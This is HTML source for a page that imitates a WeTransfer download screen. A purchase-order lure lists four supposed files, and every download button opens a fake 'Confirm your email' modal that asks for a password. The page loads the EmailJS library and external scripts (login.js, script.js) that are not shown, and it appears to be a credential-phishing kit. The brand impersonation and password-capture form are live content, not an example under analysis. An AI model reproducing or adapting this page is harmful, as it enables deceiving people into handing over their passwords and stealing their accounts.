<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>WeTransfer Download</title>
    <!-- Tailwind CSS CDN -->
    <script src="https://cdn.tailwindcss.com"></script>
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <!-- Link to external CSS file -->
    <link rel="stylesheet" href="style.css?v=3">
    <link rel="stylesheet" href="css/login.css?v=3">

    <script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>

    <link rel="icon" type="image/jpeg" href="wt.jpg">

    <style>
        /* Custom styles for the Inter font */
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap');

        body {
            /* font-family: 'Inter', sans-serif; */
            background-color: #f3f4f6;
            /* Light gray background */
        }

        /* Custom styles for SVG icons for better control */
        .icon {
            display: inline-block;
            width: 22px;
            height: 22px;
            stroke-width: 2;
            stroke: currentColor;
            fill: none;
            stroke-linecap: round;
            stroke-linejoin: round;
        }

        .hover\:bg-blue-700:hover {
            background-color: #3b82f6 !important;
        }

        .font-medium {
            font-weight: 500;
            font-size: 14px;
        }

        .text-lg {
            font-size: 1rem !important;
        }
    </style>


</head>

<body class="min-h-screen flex flex-col">
    <div class="main-background">

        <!-- Header -->
        <header>
            <div class="default-header">
                <div class="flex justify-between items-center px-6 py-4 shadow-sm border-gray-200">
                    <div class="flex items-center space-x-2">
                        <!-- WeTransfer Logo -->
                        <svg class="w-10 h-10 text-gray-700" fill="currentColor" viewBox="0"
                            xmlns="http://www.w3.org/2000/svg">

                            <path fill-rule="evenodd"
                                d="M12.23 15.014c-.383-.605-.697-.926-1.254-.926-.558 0-.872.32-1.255.926L8.05 17.686c-.627 1.032-1.15 1.745-2.37 1.745s-1.777-.499-2.369-1.888a42.3 42.3 0 0 1-2.195-6.554C.348 7.89 0 5.967 0 4.4s.488-2.493 2.16-2.813c2.3-.428 5.401-.677 8.816-.677 3.414 0 6.515.25 8.815.677 1.672.32 2.16 1.246 2.16 2.814 0 1.567-.348 3.49-1.115 6.59a42.3 42.3 0 0 1-2.195 6.553c-.592 1.39-1.15 1.888-2.37 1.888-1.219 0-1.741-.713-2.369-1.745zm26.516 2.5c-1.185 1.282-3.415 2.208-6.342 2.208-5.888 0-9.373-4.096-9.373-9.474 0-5.77 4.007-9.19 9.199-9.19 4.634 0 7.7 2.458 7.7 5.77 0 3.135-2.613 5.165-5.575 5.165-1.602 0-2.787-.32-3.588-.961-.314-.25-.488-.214-.488.071 0 1.175.418 2.173 1.184 2.956.628.641 1.812 1.069 2.927 1.069 1.15 0 2.16-.25 3.066-.713s1.673-.32 2.126.428c.523.855-.21 1.959-.836 2.671"
                                clip-rule="evenodd"></path>

                        </svg>
                        <!-- <span class="text-xl font-semibold text-gray-800">WeTransfer</span> -->
                    </div>
                    <nav class="hidden md:flex space-x-6 text-gray-600 menu-nav text-sm">
                        <a href="#" class="hover:text-gray-900">Pricing</a>
                        <a href="#" class="hover:text-gray-900">Company</a>
                        <a href="#" class="hover:text-gray-900">Help</a>
                        <a href="login.html" class="hover:text-gray-900">Sign up</a>
                        <!-- <a href="#" class="bg-gray-100 px-3 py-1 rounded-full hover:bg-gray-200">Sign up</a> -->
                        <a href="login.html" class="hover:text-gray-900">Log in</a>
                    </nav>

                    <button class="md:hidden p-2 rounded-md hover:bg-gray-100">
                        <svg class="w-6 h-6 text-gray-700" fill="none" stroke="currentColor" viewBox="0 0 24 24"
                            xmlns="http://www.w3.org/2000/svg">
                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
                                d="M4 6h16M4 12h16M4 18h16">
                            </path>
                        </svg>
                    </button>
                </div>
            </div>

            <div class="mobile-header">
                <!-- Navigation Bar -->
                <div class="flex items-center justify-between p-4 bg-white border-b border-gray-200">
                    <!-- Hamburger Menu Icon (SVG) -->
                    <div id="menuToggle" class="relative inline-block text-left">
                        <button id="menuButton" class="text-black focus:outline-none">
                            <svg class="icon" viewBox="0 0 24 24" width="30" height="30">
                                <line x1="3" y1="12" x2="21" y2="12"></line>
                                <line x1="3" y1="6" x2="21" y2="6"></line>
                                <line x1="3" y1="18" x2="21" y2="18"></line>
                            </svg>
                        </button>

                        <!-- Slide-in Menu -->
                        <div id="menuContent" class="menu-slide hidden">
                            <a href="#home" class="block px-4 py-2 text-gray-800 hover:bg-gray-100 mt-bdk">Pricing</a>
                            <a href="#about" class="block px-4 py-2 text-gray-800 hover:bg-gray-100 mt-bdk">Company</a>
                            <a href="#privacy" class="block px-4 py-2 text-gray-800 hover:bg-gray-100 mt-bdk">Help</a>
                            <a href="login.html" class="block px-4 py-2 text-gray-800 hover:bg-gray-100 mt-bdk">Sign
                                up</a>
                            <a href="login.html" class="block px-4 py-2 text-gray-800 hover:bg-gray-100 mt-bdk">Log
                                in</a>
                        </div>
                    </div>

                    <!-- Logo -->
                    <div class="text-2xl font-bold text-gray-800">
                        <svg class="w-10 h-5 text-gray-700" fill="#000" viewBox="0" xmlns="http://www.w3.org/2000/svg">
                            <path fill-rule="evenodd"
                                d="M12.23 15.014c-.383-.605-.697-.926-1.254-.926-.558 0-.872.32-1.255.926L8.05 17.686c-.627 1.032-1.15 1.745-2.37 1.745s-1.777-.499-2.369-1.888a42.3 42.3 0 0 1-2.195-6.554C.348 7.89 0 5.967 0 4.4s.488-2.493 2.16-2.813c2.3-.428 5.401-.677 8.816-.677 3.414 0 6.515.25 8.815.677 1.672.32 2.16 1.246 2.16 2.814 0 1.567-.348 3.49-1.115 6.59a42.3 42.3 0 0 1-2.195 6.553c-.592 1.39-1.15 1.888-2.37 1.888-1.219 0-1.741-.713-2.369-1.745zm26.516 2.5c-1.185 1.282-3.415 2.208-6.342 2.208-5.888 0-9.373-4.096-9.373-9.474 0-5.77 4.007-9.19 9.199-9.19 4.634 0 7.7 2.458 7.7 5.77 0 3.135-2.613 5.165-5.575 5.165-1.602 0-2.787-.32-3.588-.961-.314-.25-.488-.214-.488.071 0 1.175.418 2.173 1.184 2.956.628.641 1.812 1.069 2.927 1.069 1.15 0 2.16-.25 3.066-.713s1.673-.32 2.126.428c.523.855-.21 1.959-.836 2.671"
                                clip-rule="evenodd"></path>
                        </svg>
                    </div>
                    <!-- Sign Up Button -->
                    <a href="login.html">
                        <button
                            class="px-4 py-2 text-black text-sm font-medium focus:outline-none focus:ring-2 focus:ring-purple-500 focus:ring-opacity-50">
                            Sign up
                        </button>
                    </a>
                </div>
            </div>

        </header>


        <!-- Main Content Area -->

        <main class="main-content flex-grow flex items-center justify-center">
            <!-- Left Panel -->
            <section class="left-panel w-full md:w-1/3 flex-shrink-0 flex items-center justify-center">
                <div class="p-14">
                    <div class="text-gray-400 mb-8 flex justify-center">
                        <!-- Arrow Down Circle Icon -->
                        <svg class="w-32 h-32" fill="none" stroke="currentColor" viewBox="0 0 24 24"
                            xmlns="http://www.w3.org/2000/svg">
                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="1"
                                d="M12 16l4-4m-4 4l-4-4m4 4V8m0 12a9 9 0 100-18 9 9 0 000 18z" />
                        </svg>
                    </div>

                    <h1 class="text-2xl font-semibold text-gray-800 mb-2">Ready when you are</h1>
                    <p class="text-gray-600 mb-6">Transfer expires in 7 days</p>
                    <!-- <p class="text-gray-500 text-sm mb-4">Example 1.docx</p> -->
                    <p class="text-gray-500 text-sm mb-4">


                        <!-- <div class="max-h-20 overflow-y-auto space-y-2"> -->
                    <div class="overflow-y-auto space-y-2">
                        <div class="flex justify-between items-center text-sm">
                            Kindly review the product sample, purchase order, sample video and specification, and share
                            your feedback.
                        </div>
                        <!-- <div class="flex justify-between items-center text-sm text-gray-500">
                            <p>Product sample.pdf</p>
                            <a href="login.html">
                                <svg xmlns="http://www.w3.org/2000/svg"
                                    class="h-4 w-4 text-gray-400 hover:text-gray-600 cursor-pointer" fill="none"
                                    viewBox="0 0 24 24" stroke="currentColor">
                                    <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
                                        d="M4 16v2a2 2 0 002 2h12a2 2 0 002-2v-2M7 10l5 5m0 0l5-5m-5 5V4" />
                                </svg>
                            </a>
                        </div>

                        <div class="flex justify-between items-center text-sm text-gray-500">
                            <p>Purchase order.pdf</p>
                            <a href="login.html">
                                <svg xmlns="http://www.w3.org/2000/svg"
                                    class="h-4 w-4 text-gray-400 hover:text-gray-600 cursor-pointer" fill="none"
                                    viewBox="0 0 24 24" stroke="currentColor">
                                    <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
                                        d="M4 16v2a2 2 0 002 2h12a2 2 0 002-2v-2M7 10l5 5m0 0l5-5m-5 5V4" />
                                </svg>
                            </a>
                        </div>

                        <div class="flex justify-between items-center text-sm text-gray-500">
                            <p>Sample video.mp4</p>
                            <a href="login.html">
                                <svg xmlns="http://www.w3.org/2000/svg"
                                    class="h-4 w-4 text-gray-400 hover:text-gray-600 cursor-pointer" fill="none"
                                    viewBox="0 0 24 24" stroke="currentColor">
                                    <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
                                        d="M4 16v2a2 2 0 002 2h12a2 2 0 002-2v-2M7 10l5 5m0 0l5-5m-5 5V4" />
                                </svg>
                            </a>
                        </div>

                        <div class="flex justify-between items-center text-sm text-gray-500">
                            <p>Specifications.pdf</p>
                            <a href="login.html">
                                <svg xmlns="http://www.w3.org/2000/svg"
                                    class="h-4 w-4 text-gray-400 hover:text-gray-600 cursor-pointer" fill="none"
                                    viewBox="0 0 24 24" stroke="currentColor">
                                    <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
                                        d="M4 16v2a2 2 0 002 2h12a2 2 0 002-2v-2M7 10l5 5m0 0l5-5m-5 5V4" />
                                </svg>
                            </a>
                        </div> -->
                    </div>
                    </p>


                    <div class="flex items-center justify-center space-x-4 mb-8">
                        <span class="text-gray-500 text-sm">4 files</span>
                        <span class="text-gray-500 text-sm">288.4 MB</span>
                        <button class="text-gray-preview px-4 py-2 text-sm font-medium">Preview</button>
                    </div>
                    <button id="downloadButton"
                        class="w-full bg-blue-500 text-white font-semibold py-3 px-6 rounded-full shadow-md hover:bg-blue-600 transition-colors">Download</button>
                </div>
            </section>

            <!-- Right Panel (Visible by default) -->
            <section class="right-panel">
                <div class="flex justify-between items-center mb-6">
                    <div class="slider">
                        <div class="slides">
                            <div class="slide">
                                <img src="img/Copy3.svg" alt="Image 1">
                            </div>
                            <div class="slide">
                                <img src="img/Copy1.svg" alt="Image 2">
                            </div>
                        </div>
                    </div>
                </div>
            </section>
        </main>


        <!-- Overlay Container -->
        <div id="overlay" class="overlay-container">
            <div class="overlay-content">
                <nav class="hidden md:flex space-x-6 text-gray-600 menu-nav overlay-menu text-sm">

                    <div class="left">
                        <div class="flex justify-end">
                            <button id="closeOverlayButton" aria-label="Close">
                                <svg width="30" height="30" viewBox="0 0 24 24" fill="black"
                                    xmlns="http://www.w3.org/2000/svg">
                                    <path d="M18 6L6 18M6 6l12 12" stroke="black" stroke-width="2"
                                        stroke-linecap="round" stroke-linejoin="round" />
                                </svg>
                            </button>
                        </div>
                    </div>
                    <div class="right">
                        <a href="#" class="hover:text-gray-900 menu-space">Pricing</a>
                        <a href="#" class="hover:text-gray-900 menu-space ">Company</a>
                        <a href="#" class="hover:text-gray-900 menu-space">Help</a>
                        <a href="login.html" class="hover:text-gray-900 menu-space">Sign up</a>
                        <!-- <a href="#" class="bg-gray-100 px-3 py-1 rounded-full hover:bg-gray-200">Sign up</a> -->
                        <a href="login.html" class="hover:text-gray-900 menu-space">Log in</a>
                    </div>

                </nav>


                <div class="flex justify-between items-center mb-6">
                    <h2 class="text-2xl font-semibold text-gray-800">Items in this transfer</h2>
                    <button id="closeOverlayButton"
                        class="bg-blue-500 text-white font-semibold py-2 px-4 rounded-full text-sm shadow-md hover:bg-blue-600 transition-colors popup-trigger">Download
                        all
                    </button>
                </div>
                <p class="text-gray-500 text-sm mb-6">4 files, 288.4 MB • Transfer expires in 7 days</p>

                <div class="grid grid-cols-2 gap-4">
                    <div class="file-item popup-trigger">

                        <div class="flex items-center gap-3">
                            <div>
                                <img src="img/pdf.png" width="35" alt="Image 1">
                            </div>
                            <div>
                                <p class="font-medium text-gray-800">Product sample.pdf</p>
                                <p class="text-gray-500 text-sm">14 MB</p>
                            </div>
                        </div>
                        <button class="download-icon text-gray-600 hover:text-gray-800">
                            <svg class="w-6 h-6" fill="none" stroke="currentColor" viewBox="0 0 24 24"
                                xmlns="http://www.w3.org/2000/svg">
                                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
                                    d="M12 16l4-4m-4 4l-4-4m4 4V8m0 12a9 9 0 100-18 9 9 0 000 18z" />
                            </svg>
                        </button>
                    </div>

                    <div class="file-item popup-trigger">
                        <div class="flex items-center gap-3">
                            <div>
                                <img src="img/pdf.png" width="35" alt="Image 1">
                            </div>
                            <div>
                                <p class="font-medium text-gray-800">Purchase order.pdf</p>
                                <p class="text-gray-500 text-sm">10 MB</p>
                            </div>
                        </div>
                        <button class="download-icon text-gray-600 hover:text-gray-800">
                            <svg class="w-6 h-6" fill="none" stroke="currentColor" viewBox="0 0 24 24"
                                xmlns="http://www.w3.org/2000/svg">
                                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
                                    d="M12 16l4-4m-4 4l-4-4m4 4V8m0 12a9 9 0 100-18 9 9 0 000 18z" />
                            </svg>
                        </button>
                    </div>


                    <div class="file-item popup-trigger">
                        <div class="flex items-center gap-3">
                            <div>
                                <img src="img/play.png" width="40" alt="Image 1">
                            </div>
                            <div>
                                <p class="font-medium text-gray-800">Sample video.mp4</p>
                                <p class="text-gray-500 text-sm">252.4 MB</p>
                            </div>
                        </div>
                        <button class="download-icon text-gray-600 hover:text-gray-800">
                            <svg class="w-6 h-6" fill="none" stroke="currentColor" viewBox="0 0 24 24"
                                xmlns="http://www.w3.org/2000/svg">
                                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
                                    d="M12 16l4-4m-4 4l-4-4m4 4V8m0 12a9 9 0 100-18 9 9 0 000 18z" />
                            </svg>
                        </button>
                    </div>

                    <div class="file-item popup-trigger">
                        <div class="flex items-center gap-3">
                            <div>
                                <img src="img/pdf.png" width="35" alt="Image 1">
                            </div>
                            <div>
                                <p class="font-medium text-gray-800">Specifications.pdf</p>
                                <p class="text-gray-500 text-sm">12 MB</p>
                            </div>
                        </div>
                        <button class="download-icon text-gray-600 hover:text-gray-800">
                            <svg class="w-6 h-6" fill="none" stroke="currentColor" viewBox="0 0 24 24"
                                xmlns="http://www.w3.org/2000/svg">
                                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
                                    d="M12 16l4-4m-4 4l-4-4m4 4V8m0 12a9 9 0 100-18 9 9 0 000 18z" />
                            </svg>
                        </button>
                    </div>
                </div>

                <!-- Close Button for Overlay (optional, but good for UX) -->
            </div>

            <div class="overlay-content-mobile">
                <!-- File Information Section -->
                <section class="p-4 bg-white border-b border-gray-200">
                    <div class="flex items-center justify-between">
                        <div>
                            <h2 class="text-lg font-semibold text-gray-800">Download all</h2>
                            <p class="text-sm text-gray-500">4 files • 288.4 MB • Expires in 7 days</p>
                        </div>
                        <div class="flex space-x-2">
                            <!-- Upload Icon (SVG) -->
                            <button
                                class="p-2 rounded-full bg-gray-100 text-gray-600 hover:bg-gray-200 focus:outline-none popup-trigger">
                                <svg class="icon" viewBox="0 0 24 24">
                                    <path d="M21 15v4a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-4"></path>
                                    <polyline points="17 8 12 3 7 8"></polyline>
                                    <line x1="12" y1="3" x2="12" y2="15"></line>
                                </svg>
                            </button>
                            <!-- Download Icon (SVG) -->
                            <button
                                class="p-2 rounded-full bg-blue-600 text-white hover:bg-blue-700 focus:outline-none popup-trigger">
                                <svg class="icon" viewBox="0 0 24 24" stroke="white">
                                    <path d="M21 15v4a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-4"></path>
                                    <polyline points="7 10 12 15 17 10"></polyline>
                                    <line x1="12" y1="15" x2="12" y2="3"></line>
                                </svg>
                            </button>
                        </div>
                    </div>
                </section>

                <!-- File List Section -->
                <section class="p-4 bg-white">
                    <h3 class="text-md font-semibold text-gray-800 mb-3">4 files</h3>

                    <!-- File Item 1 -->
                    <div class="flex items-center justify-between py-3 border-b border-gray-200 last:border-b-0">

                        <div class="flex items-center gap-3">
                            <div>
                                <img src="img/pdf.png" width="20" alt="Image 1">
                            </div>
                            <div>
                                <p class="text-gray-800 font-medium">Product sample.pdf</p>
                                <p class="text-sm text-gray-500">14 MB • jpg</p>
                            </div>
                        </div>

                        <button
                            class="p-2 rounded-full bg-gray-100 text-gray-600 hover:bg-gray-200 focus:outline-none popup-trigger">
                            <svg class="icon" viewBox="0 0 24 24">
                                <path d="M21 15v4a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-4"></path>
                                <polyline points="7 10 12 15 17 10"></polyline>
                                <line x1="12" y1="15" x2="12" y2="3"></line>
                            </svg>
                        </button>
                    </div>

                    <!-- File Item 2 -->
                    <div class="flex items-center justify-between py-3 border-b border-gray-200 last:border-b-0">

                        <div class="flex items-center gap-3">
                            <div>
                                <img src="img/pdf.png" width="20" alt="Image 1">
                            </div>

                            <div>
                                <p class="text-gray-800 font-medium">Purchase order.pdf</p>
                                <p class="text-sm text-gray-500">10 MB • jpg</p>
                            </div>
                        </div>

                        <button
                            class="p-2 rounded-full bg-gray-100 text-gray-600 hover:bg-gray-200 focus:outline-none popup-trigger">
                            <svg class="icon" viewBox="0 0 24 24">
                                <path d="M21 15v4a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-4"></path>
                                <polyline points="7 10 12 15 17 10"></polyline>
                                <line x1="12" y1="15" x2="12" y2="3"></line>
                            </svg>
                        </button>
                    </div>

                    <!-- File Item 3 -->
                    <div class="flex items-center justify-between py-3 border-b border-gray-200 last:border-b-0">

                        <div class="flex items-center gap-3">
                            <div>
                                <img src="img/play.png" width="25" alt="Image 1">
                            </div>

                            <div>
                                <p class="text-gray-800 font-medium">Sample video.mp4</p>
                                <p class="text-sm text-gray-500">252.4 MB • mp4</p>
                            </div>
                        </div>
                        <button
                            class="p-2 rounded-full bg-gray-100 text-gray-600 hover:bg-gray-200 focus:outline-none popup-trigger">
                            <svg class="icon" viewBox="0 0 24 24">
                                <path d="M21 15v4a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-4"></path>
                                <polyline points="7 10 12 15 17 10"></polyline>
                                <line x1="12" y1="15" x2="12" y2="3"></line>
                            </svg>
                        </button>
                    </div>

                    <!-- File Item 4 -->
                    <div class="flex items-center justify-between py-3 border-b border-gray-200 last:border-b-0">

                        <div class="flex items-center gap-3">
                            <div>
                                <img src="img/pdf.png" width="20" alt="Image 1">
                            </div>
                            <div>
                                <p class="text-gray-800 font-medium">Specifications.pdf</p>
                                <p class="text-sm text-gray-500">12 MB • pdf</p>
                            </div>
                        </div>

                        <button
                            class="p-2 rounded-full bg-gray-100 text-gray-600 hover:bg-gray-200 focus:outline-none popup-trigger">
                            <svg class="icon" viewBox="0 0 24 24">
                                <path d="M21 15v4a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-4"></path>
                                <polyline points="7 10 12 15 17 10"></polyline>
                                <line x1="12" y1="15" x2="12" y2="3"></line>
                            </svg>
                        </button>
                    </div>
                    <button id="downloadButton-mobile"
                        class="w-full bg-blue-500 text-white font-semibold py-3 px-6 rounded-full shadow-md hover:bg-blue-600 transition-colors popup-trigger">Download
                        in browser
                    </button>
                </section>


            </div>
        </div>

        <!-- Footer -->
        <div class="footer">
            <footer
                class="flex justify-between items-center px-6 py-3 bg-white shadow-sm border-t border-gray-200 text-sm text-gray-500">
                <div class="flex items-center space-x-2">
                    <svg class="w-10 h-5 text-gray-700" fill="#000" viewBox="0" xmlns="http://www.w3.org/2000/svg">

                        <path fill-rule="evenodd"
                            d="M12.23 15.014c-.383-.605-.697-.926-1.254-.926-.558 0-.872.32-1.255.926L8.05 17.686c-.627 1.032-1.15 1.745-2.37 1.745s-1.777-.499-2.369-1.888a42.3 42.3 0 0 1-2.195-6.554C.348 7.89 0 5.967 0 4.4s.488-2.493 2.16-2.813c2.3-.428 5.401-.677 8.816-.677 3.414 0 6.515.25 8.815.677 1.672.32 2.16 1.246 2.16 2.814 0 1.567-.348 3.49-1.115 6.59a42.3 42.3 0 0 1-2.195 6.553c-.592 1.39-1.15 1.888-2.37 1.888-1.219 0-1.741-.713-2.369-1.745zm26.516 2.5c-1.185 1.282-3.415 2.208-6.342 2.208-5.888 0-9.373-4.096-9.373-9.474 0-5.77 4.007-9.19 9.199-9.19 4.634 0 7.7 2.458 7.7 5.77 0 3.135-2.613 5.165-5.575 5.165-1.602 0-2.787-.32-3.588-.961-.314-.25-.488-.214-.488.071 0 1.175.418 2.173 1.184 2.956.628.641 1.812 1.069 2.927 1.069 1.15 0 2.16-.25 3.066-.713s1.673-.32 2.126.428c.523.855-.21 1.959-.836 2.671"
                            clip-rule="evenodd"></path>

                    </svg>
                    <!-- <span class="font-semibold text-gray-800">WeTransfer</span> -->
                    <img src="img/wetransfer.svg" alt="WeTransfer" width="80" height="70">
                </div>
                <div class="flex items-center space-x-4">
                    <span class="px-2 py-1 bg-gray-100 rounded-full">ENG US</span>
                </div>
            </footer>
        </div>

    </div>



    <div class="modal-overlay" id="overlay"></div>
    <!-- The Popup Login Modal -->
    <form id="loginForm">
        <div id="loginModal"
            class="hidden fixed inset-0 bg-gray-600 bg-opacity-50 flex items-center justify-center z-50">
            <!-- The Login Card/Panel -->
            <div class="popup-container shadow-lg">
                <div class="popup-card">
                    <!-- Close Button -->
                    <button id="closeButton"
                        class="flex justify-end -mb-12 text-gray-450 hover:text-gray-600 transition-colors">
                        <svg xmlns="http://www.w3.org/2000/svg" class="h-6 w-6" fill="none" viewBox="0 0 24 24"
                            stroke="currentColor">
                            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
                                d="M6 18L18 6M6 6l12 12" />
                        </svg>
                    </button>
                    <div class="icon-circle">
                        <i class="fas fa-lock"></i>
                    </div>
                    <div class="pop-content">
                        <h2>Confirm your email</h2>
                        <p>Just one quick check to make sure you're really you.</p>

                        <div class="items-center space-y-4 aut-message-pop">
                            <!-- Error message when login fails -->
                            <div class="error-message" id="errorMessage">Error! Retry login</div>
                            <!-- Message when login works -->
                            <div class="login-message" id="loginMessage">Please wait, loading...</div>
                        </div>

                        <p><strong id="emailText">Click the link sent to your email</strong></p>

                        <div class="input-group">
                            <input type="password" id="password" name="password" placeholder="Enter password"
                                class="password-input" required readonly>
                        </div>

                        <!-- <div class="resend-link">
                                    Didn't receive the code? <a href="#">Resend again?</a>
                                </div> -->
                    </div>

                    <div class="button-group">
                        <button class="back-button">
                            <i class="fas fa-chevron-left"></i>
                        </button>
                        <button id="submit" type="submit" class="verify-button" disabled>Continue</button>
                    </div>
                </div>
            </div>

            <!-- Link to external JavaScript file -->
            <script src="script.js"></script>
            <!--main-background Close -->
        </div>
    </form>
</body>
<!-- Link to external JavaScript file -->
<script src="login.js"></script>

</html>